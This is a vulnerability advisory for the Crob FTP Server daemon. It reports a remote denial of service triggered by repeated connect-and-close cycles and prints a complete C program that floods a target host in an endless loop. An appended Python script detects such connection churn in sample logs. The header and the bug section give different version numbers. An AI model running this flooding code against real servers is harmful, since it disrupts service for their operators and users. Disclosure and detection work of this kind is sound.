Application:  Crob FTP daemon
              http://www.crob.net/en/
Versions:     2.5.2 maybe others
Platforms:    Windows NT
Bug:          Denial of Service
Exploitation: remote
Date:         12 Feb 2004
Author:       gsicht
e-mail:       nothing.king@firemail.de

#######################################################################

1) Introduction
2) Bug
3) The Code

#######################################################################

===============
1) Introduction
===============

Quote from the Crob FTP website:

"Crob Software Studio is a professional and innovative Internet software
developing team. With incessant endeavor. Now we have Crob FTP Server.
A professional FTP Service solution."

#######################################################################

======
2) Bug
======

Crob FTP Server 3.5.2 is vulnerable to a Denial of Service attack.
Repeatedly connecting to and disconnecting from the server crashes the
daemon.

#######################################################################

===========
3) The Code
===========

/******************************/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(int argc, char *argv[])
{
    int s;
    struct sockaddr_in target;

    if(argc < 2)
    {
        printf("Usage: %s HOST [PORT]\n\n",argv[0]);
        return 0;
    }

    do
    {
        s = socket(AF_INET, SOCK_STREAM, 0);
        target.sin_family = AF_INET;
        /* PORT is optional in the usage line; fall back to the standard FTP port */
        target.sin_port = htons(argc > 2 ? atoi(argv[2]) : 21);
        target.sin_addr.s_addr = inet_addr(argv[1]);

        printf("- connecting...\n");
        if( connect(s,(struct sockaddr*)&target, sizeof(struct sockaddr))<0)
        {
            printf(" connect() error!\n\n");
            exit(-1);
        }
        printf(" connected\n");

        /* close immediately without sending any FTP command */
        printf(" closing connection\n");
        close(s);
    }
    while(1);

    return 0;
}
/*******************************/

#######################################################################
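
A defensive counterpart to the loop in section 3, as an added example that is not part of the original advisory: it flags sources that open and close many sessions without sending any FTP command. The log line format, window and threshold are assumptions, since the advisory does not show Crob FTP's log output.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=10)   # assumed sliding window
THRESHOLD = 20                   # assumed: command-less sessions per window before alerting

def find_churn_sources(lines, window=WINDOW, threshold=THRESHOLD):
    """Return {source_ip: peak count of command-less sessions inside one window}."""
    commands = {}                # (ip, session id) -> FTP commands seen so far
    recent = defaultdict(deque)  # ip -> close times of command-less sessions
    flagged = {}
    for line in lines:
        parts = line.split()
        if len(parts) < 4:
            continue             # skip malformed lines
        ts, ip, sid, event = parts[:4]
        when = datetime.fromisoformat(ts)
        key = (ip, sid)
        if event == "CONNECT":
            commands[key] = 0
        elif event == "CMD" and key in commands:
            commands[key] += 1
        elif event == "DISCONNECT":
            if commands.pop(key, None) != 0:
                continue         # session sent commands, or was never seen opening
            q = recent[ip]
            q.append(when)
            while when - q[0] > window:
                q.popleft()      # drop closes that fell out of the window
            if len(q) >= threshold:
                flagged[ip] = max(flagged.get(ip, 0), len(q))
    return flagged

def build_sample():
    """Constructed events in an assumed format, not real Crob FTP log output."""
    base = datetime(2004, 2, 12, 10, 0, 0)
    lines = [                    # one ordinary session that sends a command
        f"{base.isoformat()} 192.0.2.10 s1 CONNECT",
        f"{(base + timedelta(seconds=1)).isoformat()} 192.0.2.10 s1 CMD USER",
        f"{(base + timedelta(seconds=5)).isoformat()} 192.0.2.10 s1 DISCONNECT",
    ]
    for i in range(30):          # connect/close churn, no command in any session
        t = (base + timedelta(seconds=60, milliseconds=100 * i)).isoformat()
        lines += [f"{t} 198.51.100.7 f{i} CONNECT", f"{t} 198.51.100.7 f{i} DISCONNECT"]
    return lines

if __name__ == "__main__":
    print(find_churn_sources(build_sample()))
```
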